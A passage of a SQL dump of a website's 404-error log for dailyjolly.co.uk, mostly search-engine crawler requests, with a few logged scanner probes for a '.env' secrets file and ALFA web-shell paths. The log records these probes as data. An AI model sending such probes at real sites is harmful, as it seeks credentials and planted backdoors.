22:41:27','/asm53sbg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36853,'2023-01-25 22:49:26','/stian26/dso3bqoe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36854,'2023-01-25 22:51:49','/kkpwjo5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36855,'2023-01-25 23:07:18','/i41v2lig2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36856,'2023-01-25 23:08:53','/ieb7gdce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36857,'2023-01-25 23:11:11','/9ocnl49f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36858,'2023-01-25 23:11:32','/wn1nmi1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36859,'2023-01-25 23:18:13','/kgy4hcle2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36860,'2023-01-25 23:20:49','/iee9sc4g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36861,'2023-01-25 23:28:45','/collection/cmlkz2vz-47','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36862,'2023-01-25 23:29:54','/boutsrimes/wj1mqmue2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36863,'2023-01-25 23:35:45','/curtation2/tf03mf0f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36864,'2023-01-25 23:41:28','/tfsic64e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36865,'2023-01-25 23:53:23','/metre/11twu3qf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36866,'2023-01-25 23:54:59','/dse7ux1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36867,'2023-01-26 00:12:59','/page/5','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; trendictionbot0.5.0; trendiction search; http://www.trendiction.de/bot; please let us know of any problems; web at trendiction.com) Gecko/20170101 Firefox/67.0',NULL,404,'GET',NULL,'144.76.22.15'),(36868,'2023-01-26 00:29:27','/ries/14k3lnsg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36869,'2023-01-26 00:41:49','/northland11/aqbgsj3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36870,'2023-01-26 00:53:31','/tvg3w2je2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36871,'2023-01-26 00:54:49','/amf615fe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36872,'2023-01-26 00:59:22','/wt1lsx1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36873,'2023-01-26 01:04:31','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36874,'2023-01-26 01:11:42','/tfywpaef2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36875,'2023-01-26 01:14:22','/wpf9cqlg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36876,'2023-01-26 01:22:16','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36877,'2023-01-26 01:25:42','/auditing/wf7ewckd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36878,'2023-01-26 01:26:36','/tag/uk/72859446','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(36879,'2023-01-26 01:55:59','/notice/ZGV2yw5hz2fyaq-67','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36880,'2023-01-26 01:56:04','/wtzqls1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36881,'2023-01-26 02:09:17','/internship/tes6aqye2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36882,'2023-01-26 02:09:49','/zunis2/teru4mke2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36883,'2023-01-26 02:18:09','/9rsdsp4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36884,'2023-01-26 02:25:18','/zygosphene32/acwa9q9f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36885,'2023-01-26 02:29:20','/aajbautf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36886,'2023-01-26 02:43:22','/radix4/9invdvag2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36887,'2023-01-26 02:47:35','/paymastergeneral19/ishxwikd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36888,'2023-01-26 02:48:32','/osteotomist17/tipyogkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36889,'2023-01-26 02:49:35','/scythewhet/9bys8e4g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36890,'2023-01-26 02:53:59','/wrdmundg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36891,'2023-01-26 02:56:03','/advice/lev-bGV2aX/193lanth','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36892,'2023-01-26 03:47:47','/tfk9eqef2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36893,'2023-01-26 03:48:39','/.env','https://dailyjolly.co.uk','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36',NULL,404,'POST',NULL,'109.237.98.53'),(36894,'2023-01-26 03:49:38','/dkkxzl0e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36895,'2023-01-26 03:57:59','/1xch9fpg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36896,'2023-01-26 04:00:49','/detqdxsf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36897,'2023-01-26 04:09:24','/rel/uk/en-010-009582112','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'213.180.203.87'),(36898,'2023-01-26 04:26:39','/wlgvjp3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36899,'2023-01-26 04:53:26','/spirometer36/tosk61vf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36900,'2023-01-26 04:57:25','/garambulla60/twqwwckd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36901,'2023-01-26 04:58:04','/aio1uthf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36902,'2023-01-26 05:00:25','/tj3990vg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36903,'2023-01-26 05:04:26','/blackandblue/tblpg96e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36904,'2023-01-26 05:11:03','/1yanpl5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36905,'2023-01-26 05:27:59','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.3302.140 Safari/537.36 Edge/18.18960','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36906,'2023-01-26 05:28:01','/apposable3/9ikvsmkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36907,'2023-01-26 05:30:50','/as2o27cf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36908,'2023-01-26 05:31:01','/siccate4/tonwytkg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36909,'2023-01-26 05:33:17','/nerviest/t7iu91ig2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36910,'2023-01-26 05:36:27','/scared12/9bmziekd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36911,'2023-01-26 05:45:42','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.200.135.13'),(36912,'2023-01-26 05:45:43','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.200.135.13'),(36913,'2023-01-26 05:45:44','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.200.135.13'),(36914,'2023-01-26 05:45:45','/app-ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',NULL,404,'GET',NULL,'44.200.135.13'),(36915,'2023-01-26 05:46:49','/kyqro3mg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36916,'2023-01-26 05:58:36','/chip41/9ib0bckd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36917,'2023-01-26 06:09:31','/contents/phytop6','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36918,'2023-01-26 06:09:51','/repast/ay4h5b1f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36919,'2023-01-26 06:14:40','/tesz4ybe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36920,'2023-01-26 06:25:30','/1qlpgjde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36921,'2023-01-26 06:32:16','/ieijmzgg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36922,'2023-01-26 06:33:04','/92rlu22g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36923,'2023-01-26 06:43:06','/dh5cwslf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36924,'2023-01-26 06:57:12','/mt/','https://www.dailyjolly.co.uk','python-requests/2.26.0',NULL,404,'GET',NULL,'196.74.207.174'),(36925,'2023-01-26 06:57:13','/ALFA_DATA/alfacgiapi/','https://www.dailyjolly.co.uk','python-requests/2.26.0',NULL,404,'GET',NULL,'196.74.207.174'),(36926,'2023-01-26 06:57:23','/wp-content/ALFA_DATA/alfacgiapi/','https://www.dailyjolly.co.uk','python-requests/2.26.0',NULL,404,'GET',NULL,'196.74.207.174'),(36927,'2023-01-26 07:12:10','/t2dgk4ce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36928,'2023-01-26 07:22:52','/10bzi8ee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36929,'2023-01-26 07:36:32','/collie/k0g3d9ne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36930,'2023-01-26 07:54:27','/whhrwojd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36931,'2023-01-26 07:59:50','/dkkme4oe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36932,'2023-01-26 07:59:51','/poachiness/is0guckd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36933,'2023-01-26 08:00:24','/notice/dHlwag9z-67','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36934,'2023-01-26 08:00:46','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36935,'2023-01-26 08:07:54','/9r4q2d5h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36936,'2023-01-26 08:26:36','/92v4j56e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36937,'2023-01-26 08:28:00','/kcw1e18g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36938,'2023-01-26 08:35:20','/moxie/1hnovx1g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36939,'2023-01-26 08:40:45','/news-bxv0dG9ucw4.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36940,'2023-01-26 08:47:08','/naughty18/writ2ckd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36941,'2023-01-26 08:52:11','/aqejpz4e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36942,'2023-01-26 08:53:59','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36943,'2023-01-26 09:25:34','/tv4ykj9e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36944,'2023-01-26 09:35:33','/cheviot/iew01d3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36945,'2023-01-26 10:12:48','/melne4/1mq6vo2h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36946,'2023-01-26 10:12:55','/notes/flash14','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36947,'2023-01-26 10:28:37','/asgptnfg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36948,'2023-01-26 10:28:42','/artocarpus3/twymo4yf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36949,'2023-01-26 10:38:06','/isr02kce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36950,'2023-01-26 